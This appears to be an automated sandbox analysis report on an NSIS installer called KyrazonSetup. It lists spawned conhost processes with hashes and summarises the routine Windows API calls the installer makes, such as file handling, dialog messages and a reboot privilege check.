                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:395
                                                                                    Start time:17:55:19
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:415
                                                                                    Start time:17:55:20
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:420
                                                                                    Start time:17:55:21
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:424
                                                                                    Start time:17:55:21
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:430
                                                                                    Start time:17:55:22
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:465
                                                                                    Start time:17:55:24
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:469
                                                                                    Start time:17:55:24
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:496
                                                                                    Start time:17:55:26
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:506
                                                                                    Start time:17:55:27
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:511
                                                                                    Start time:17:55:27
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:531
                                                                                    Start time:17:55:29
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:546
                                                                                    Start time:17:55:31
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:566
                                                                                    Start time:17:55:32
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:571
                                                                                    Start time:17:55:33
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:605
                                                                                    Start time:17:55:36
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:621
                                                                                    Start time:17:55:38
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:636
                                                                                    Start time:17:55:39
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:656
                                                                                    Start time:17:55:45
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false


                                                                                      Execution Graph

                                                                                      Execution Coverage:26.9%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:21.1%
                                                                                      Total number of Nodes:1277
                                                                                      Total number of Limit Nodes:40
SetFileAttributesA 4087->4088 4089 4015b6 4088->4089 4090 401a1e 4091 402acb 17 API calls 4090->4091 4092 401a27 ExpandEnvironmentStringsA 4091->4092 4093 401a3b 4092->4093 4094 401a4e 4092->4094 4093->4094 4095 401a40 lstrcmpA 4093->4095 4095->4094 4101 40171f 4102 402acb 17 API calls 4101->4102 4103 401726 SearchPathA 4102->4103 4104 401741 4103->4104 4105 401d20 4106 402aa9 17 API calls 4105->4106 4107 401d2e SetWindowLongA 4106->4107 4108 402957 4107->4108 4109 404822 4110 404832 4109->4110 4111 40484e 4109->4111 4120 4056a0 GetDlgItemTextA 4110->4120 4113 404881 4111->4113 4114 404854 SHGetPathFromIDListA 4111->4114 4116 40486b SendMessageA 4114->4116 4117 404864 4114->4117 4115 40483f SendMessageA 4115->4111 4116->4113 4118 40140b 2 API calls 4117->4118 4118->4116 4120->4115 4121 4041aa 4122 4041c0 4121->4122 4127 4042cc 4121->4127 4125 40403f 18 API calls 4122->4125 4123 40433b 4124 404405 4123->4124 4126 404345 GetDlgItem 4123->4126 4133 4040a6 8 API calls 4124->4133 4128 404216 4125->4128 4129 4043c3 4126->4129 4130 40435b 4126->4130 4127->4123 4127->4124 4131 404310 GetDlgItem SendMessageA 4127->4131 4132 40403f 18 API calls 4128->4132 4129->4124 4134 4043d5 4129->4134 4130->4129 4138 404381 SendMessageA LoadCursorA SetCursor 4130->4138 4154 404061 KiUserCallbackDispatcher 4131->4154 4136 404223 CheckDlgButton 4132->4136 4137 404400 4133->4137 4140 4043db SendMessageA 4134->4140 4141 4043ec 4134->4141 4152 404061 KiUserCallbackDispatcher 4136->4152 4155 40444e 4138->4155 4140->4141 4141->4137 4145 4043f2 SendMessageA 4141->4145 4142 404336 4146 40442a SendMessageA 4142->4146 4145->4137 4146->4123 4147 404241 GetDlgItem 4153 404074 SendMessageA 4147->4153 4149 404257 SendMessageA 4150 404275 GetSysColor 4149->4150 4151 40427e SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4149->4151 4150->4151 4151->4137 4152->4147 4153->4149 4154->4142 4158 405682 ShellExecuteExA 4155->4158 4157 4043b4 LoadCursorA SetCursor 4157->4129 4158->4157 3123 401e2b 
3124 402aa9 17 API calls 3123->3124 3125 401e31 3124->3125 3126 402aa9 17 API calls 3125->3126 3127 401e3d 3126->3127 3128 401e54 EnableWindow 3127->3128 3129 401e49 ShowWindow 3127->3129 3130 402957 3128->3130 3129->3130 4159 4063ad WaitForSingleObject 4160 4063c7 4159->4160 4161 4063d9 GetExitCodeProcess 4160->4161 4162 406374 2 API calls 4160->4162 4163 4063ce WaitForSingleObject 4162->4163 4163->4160 4164 401f31 4165 402acb 17 API calls 4164->4165 4166 401f38 4165->4166 4167 4062a3 2 API calls 4166->4167 4168 401f3e 4167->4168 4169 401f50 4168->4169 4171 405efe wsprintfA 4168->4171 4171->4169 3470 401932 3471 401934 3470->3471 3472 402acb 17 API calls 3471->3472 3473 401939 3472->3473 3476 405768 3473->3476 3477 405a26 18 API calls 3476->3477 3478 405788 3477->3478 3479 405790 DeleteFileA 3478->3479 3480 4057a7 3478->3480 3484 401942 3479->3484 3481 4058d5 3480->3481 3513 405fa0 lstrcpynA 3480->3513 3481->3484 3487 4062a3 2 API calls 3481->3487 3483 4057cd 3485 4057e0 3483->3485 3486 4057d3 lstrcatA 3483->3486 3489 40597f 2 API calls 3485->3489 3488 4057e6 3486->3488 3490 4058f9 3487->3490 3491 4057f4 lstrcatA 3488->3491 3492 4057ff lstrlenA FindFirstFileA 3488->3492 3489->3488 3490->3484 3493 405938 3 API calls 3490->3493 3491->3492 3492->3481 3511 405823 3492->3511 3494 405903 3493->3494 3496 405720 5 API calls 3494->3496 3495 405963 CharNextA 3495->3511 3497 40590f 3496->3497 3498 405913 3497->3498 3499 405929 3497->3499 3498->3484 3504 4050c7 24 API calls 3498->3504 3500 4050c7 24 API calls 3499->3500 3500->3484 3501 4058b4 FindNextFileA 3503 4058cc FindClose 3501->3503 3501->3511 3503->3481 3505 405920 3504->3505 3506 405d7f 36 API calls 3505->3506 3506->3484 3508 405768 60 API calls 3508->3511 3509 4050c7 24 API calls 3509->3501 3510 4050c7 24 API calls 3510->3511 3511->3495 3511->3501 3511->3508 3511->3509 3511->3510 3512 405d7f 36 API calls 3511->3512 3514 405fa0 lstrcpynA 3511->3514 3515 405720 3511->3515 3512->3511 3513->3483 3514->3511 3523 405b14 
GetFileAttributesA 3515->3523 3518 405743 DeleteFileA 3521 405749 3518->3521 3519 40573b RemoveDirectoryA 3519->3521 3520 40574d 3520->3511 3521->3520 3522 405759 SetFileAttributesA 3521->3522 3522->3520 3524 40572c 3523->3524 3525 405b26 SetFileAttributesA 3523->3525 3524->3518 3524->3519 3524->3520 3525->3524 4172 402932 SendMessageA 4173 402957 4172->4173 4174 40294c InvalidateRect 4172->4174 4174->4173 4175 4014b7 4176 4014bd 4175->4176 4177 401389 2 API calls 4176->4177 4178 4014c5 4177->4178 4179 4026ba 4180 4026c0 4179->4180 4181 402957 4180->4181 4182 4026c8 FindClose 4180->4182 4182->4181 3620 4015bb 3621 402acb 17 API calls 3620->3621 3622 4015c2 3621->3622 3623 4059d1 4 API calls 3622->3623 3635 4015ca 3623->3635 3624 401624 3626 401652 3624->3626 3627 401629 3624->3627 3625 405963 CharNextA 3625->3635 3630 401423 24 API calls 3626->3630 3628 401423 24 API calls 3627->3628 3629 401630 3628->3629 3639 405fa0 lstrcpynA 3629->3639 3637 40164a 3630->3637 3632 40560a 2 API calls 3632->3635 3633 405627 5 API calls 3633->3635 3634 40163b SetCurrentDirectoryA 3634->3637 3635->3624 3635->3625 3635->3632 3635->3633 3636 40160c GetFileAttributesA 3635->3636 3638 40558d 4 API calls 3635->3638 3636->3635 3638->3635 3639->3634 4183 40503b 4184 40504b 4183->4184 4185 40505f 4183->4185 4186 405051 4184->4186 4195 4050a8 4184->4195 4187 405067 IsWindowVisible 4185->4187 4191 40507e 4185->4191 4189 40408b SendMessageA 4186->4189 4190 405074 4187->4190 4187->4195 4188 4050ad CallWindowProcA 4192 40505b 4188->4192 4189->4192 4193 404992 5 API calls 4190->4193 4191->4188 4194 404a12 4 API calls 4191->4194 4193->4191 4194->4195 4195->4188 4196 4016bb 4197 402acb 17 API calls 4196->4197 4198 4016c1 GetFullPathNameA 4197->4198 4201 4016d8 4198->4201 4205 4016f9 4198->4205 4199 402957 4200 40170d GetShortPathNameA 4200->4199 4202 4062a3 2 API calls 4201->4202 4201->4205 4203 4016e9 4202->4203 4203->4205 4206 405fa0 lstrcpynA 4203->4206 4205->4199 4205->4200 4206->4205 4207 
40273c 4208 402acb 17 API calls 4207->4208 4210 40274a 4208->4210 4209 402760 4212 405b14 2 API calls 4209->4212 4210->4209 4211 402acb 17 API calls 4210->4211 4211->4209 4213 402766 4212->4213 4235 405b39 GetFileAttributesA CreateFileA 4213->4235 4215 402773 4216 40281c 4215->4216 4217 40277f GlobalAlloc 4215->4217 4220 402824 DeleteFileA 4216->4220 4221 402837 4216->4221 4218 402813 CloseHandle 4217->4218 4219 402798 4217->4219 4218->4216 4236 4031c4 SetFilePointer 4219->4236 4220->4221 4223 40279e 4224 4031ae ReadFile 4223->4224 4225 4027a7 GlobalAlloc 4224->4225 4226 4027f1 4225->4226 4227 4027b7 4225->4227 4228 405be0 WriteFile 4226->4228 4229 402f9c 31 API calls 4227->4229 4230 4027fd GlobalFree 4228->4230 4234 4027c4 4229->4234 4231 402f9c 31 API calls 4230->4231 4233 402810 4231->4233 4232 4027e8 GlobalFree 4232->4226 4233->4218 4234->4232 4235->4215 4236->4223 4237 401b3f 4238 402acb 17 API calls 4237->4238 4239 401b46 4238->4239 4240 402aa9 17 API calls 4239->4240 4241 401b4f wsprintfA 4240->4241 4242 402957 4241->4242

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE ref: 00403231
                                                                                      • GetVersion.KERNEL32 ref: 00403237
                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040326A
                                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032A6
                                                                                      • OleInitialize.OLE32(00000000), ref: 004032AD
                                                                                      • SHGetFileInfoA.SHELL32(00434030,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032C9
                                                                                      • GetCommandLineA.KERNEL32(0044E400,NSIS Error,?,00000006,00000008,0000000A), ref: 004032DE
                                                                                      • CharNextA.USER32(00000000,0047B000,00000020,0047B000,00000000,?,00000006,00000008,0000000A), ref: 0040331A
                                                                                      • GetTempPathA.KERNELBASE(00002000,00485000,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403417
                                                                                      • GetWindowsDirectoryA.KERNEL32(00485000,00001FFB,?,00000006,00000008,0000000A), ref: 00403428
                                                                                      • lstrcatA.KERNEL32(00485000,\Temp,?,00000006,00000008,0000000A), ref: 00403434
                                                                                      • GetTempPathA.KERNEL32(00001FFC,00485000,00485000,\Temp,?,00000006,00000008,0000000A), ref: 00403448
                                                                                      • lstrcatA.KERNEL32(00485000,Low,?,00000006,00000008,0000000A), ref: 00403450
                                                                                      • SetEnvironmentVariableA.KERNEL32(TEMP,00485000,00485000,Low,?,00000006,00000008,0000000A), ref: 00403461
                                                                                      • SetEnvironmentVariableA.KERNEL32(TMP,00485000,?,00000006,00000008,0000000A), ref: 00403469
                                                                                      • DeleteFileA.KERNELBASE(00483000,?,00000006,00000008,0000000A), ref: 0040347D
                                                                                        • Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                                                                                        • Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                                                                                        • Part of subcall function 004037CE: lstrlenA.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,0047D000,00483000,0043C070,80000001,Control Panel\Desktop\ResourceLocale,00000000,0043C070,00000000,00000002,74DF3410), ref: 004038BE
                                                                                        • Part of subcall function 004037CE: lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
                                                                                        • Part of subcall function 004037CE: GetFileAttributesA.KERNEL32(Remove folder: ), ref: 004038DC
                                                                                        • Part of subcall function 004037CE: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,0047D000), ref: 00403925
                                                                                        • Part of subcall function 004037CE: RegisterClassA.USER32(0044E3A0), ref: 00403962
                                                                                      • ExitProcess.KERNEL32(?,?,00000006,00000008,0000000A), ref: 00403526
                                                                                        • Part of subcall function 004036F4: CloseHandle.KERNEL32(FFFFFFFF,0040352B,?,?,00000006,00000008,0000000A), ref: 004036FF
                                                                                      • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 0040352B
                                                                                      • ExitProcess.KERNEL32 ref: 0040354C
                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403669
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403670
                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403688
                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A7
                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004036CB
                                                                                      • ExitProcess.KERNEL32 ref: 004036EE
                                                                                        • Part of subcall function 004056BC: MessageBoxIndirectA.USER32(0040A218), ref: 00405717
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$Exit$File$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                                      • String ID: "$.tmp$0 C$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Kt$~nsu
                                                                                      • API String ID: 562314493-718682211
                                                                                      • Opcode ID: 19d9ae6564521ff10ca6c44c5a733c1293471e642710be4a9d2b41dec4053a02
                                                                                      • Instruction ID: d5c24e8c69225464c2db3592b0ad4ce52127ac0cc508638c6bb98776a2d2aa45
                                                                                      • Opcode Fuzzy Hash: 19d9ae6564521ff10ca6c44c5a733c1293471e642710be4a9d2b41dec4053a02
                                                                                      • Instruction Fuzzy Hash: A3C1D870504741AAD7216F759E89B2F3EACAF46706F04443FF581B61E2CB7C8A058B6E

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405264
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405273
                                                                                      • GetClientRect.USER32(?,?), ref: 004052B0
                                                                                      • GetSystemMetrics.USER32(00000002), ref: 004052B7
                                                                                      • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004052D8
                                                                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052E9
                                                                                      • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052FC
                                                                                      • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040530A
                                                                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040531D
                                                                                      • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040533F
                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405353
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405374
                                                                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405384
                                                                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040539D
                                                                                      • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053A9
                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405282
                                                                                        • Part of subcall function 00404074: SendMessageA.USER32(00000028,?,00000001,00403EA4), ref: 00404082
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004053C5
                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00005199,00000000), ref: 004053D3
                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004053DA
                                                                                      • ShowWindow.USER32(00000000), ref: 004053FD
                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405404
                                                                                      • ShowWindow.USER32(00000008), ref: 0040544A
                                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040547E
                                                                                      • CreatePopupMenu.USER32 ref: 0040548F
                                                                                      • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054A4
                                                                                      • GetWindowRect.USER32(?,000000FF), ref: 004054C4
                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054DD
                                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405519
                                                                                      • OpenClipboard.USER32(00000000), ref: 00405529
                                                                                      • EmptyClipboard.USER32 ref: 0040552F
                                                                                      • GlobalAlloc.KERNEL32(00000042,?), ref: 00405538
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405542
                                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405556
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040556F
                                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 0040557A
                                                                                      • CloseClipboard.USER32 ref: 00405580
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 4154960007-0
                                                                                      • Opcode ID: dc9db1bb3042da1a1ed873bad6f0944ebfaf90529de2f46f5703e5cd34e1212a
                                                                                      • Instruction ID: cb443ab1f87c712d4fb343c0872367a3fcca99d855a89080dff2c14af257ba1e
                                                                                      • Opcode Fuzzy Hash: dc9db1bb3042da1a1ed873bad6f0944ebfaf90529de2f46f5703e5cd34e1212a
                                                                                      • Instruction Fuzzy Hash: 21A17B71900608BFEB119FA1DE89EAE7B79FB08345F00403AFA41B61A1C7758E51DF68

                                                                                      Control-flow Graph (legend: Executed, Not Executed)
                                                                                      APIs
                                                                                      • DeleteFileA.KERNELBASE(?,?,74DF3410,00485000,00000000), ref: 00405791
                                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\*.*,?,?,74DF3410,00485000,00000000), ref: 004057D9
                                                                                      • lstrcatA.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\*.*,?,?,74DF3410,00485000,00000000), ref: 004057FA
                                                                                      • lstrlenA.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\*.*,?,?,74DF3410,00485000,00000000), ref: 00405800
                                                                                      • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\*.*,?,?,74DF3410,00485000,00000000), ref: 00405811
                                                                                      • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058BE
                                                                                      • FindClose.KERNEL32(00000000), ref: 004058CF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\*.*$\*.*
                                                                                      • API String ID: 2035342205-2901176145
                                                                                      • Opcode ID: c0b77bb7ec77e54292dcea2d95d3dd54b397864b60da3618d9e1bcabfe4094fc
                                                                                      • Instruction ID: 4034ce2da7d910ed1c3e993348aad1dec665958d5cdc48b45f2fa778073bb28c
                                                                                      • Opcode Fuzzy Hash: c0b77bb7ec77e54292dcea2d95d3dd54b397864b60da3618d9e1bcabfe4094fc
                                                                                      • Instruction Fuzzy Hash: 2C51B331800A05FAEF216B618C85BAF7A78DF42314F14817FF841B61E2D73C4952EE6A
                                                                                      APIs
                                                                                      • FindFirstFileA.KERNELBASE(74DF3410,004480C0,C:\,00405A69,C:\,C:\,00000000,C:\,C:\,74DF3410,?,00485000,00405788,?,74DF3410,00485000), ref: 004062AE
                                                                                      • FindClose.KERNELBASE(00000000), ref: 004062BA
                                                                                      Strings
                                                                                      Memory Dump Source
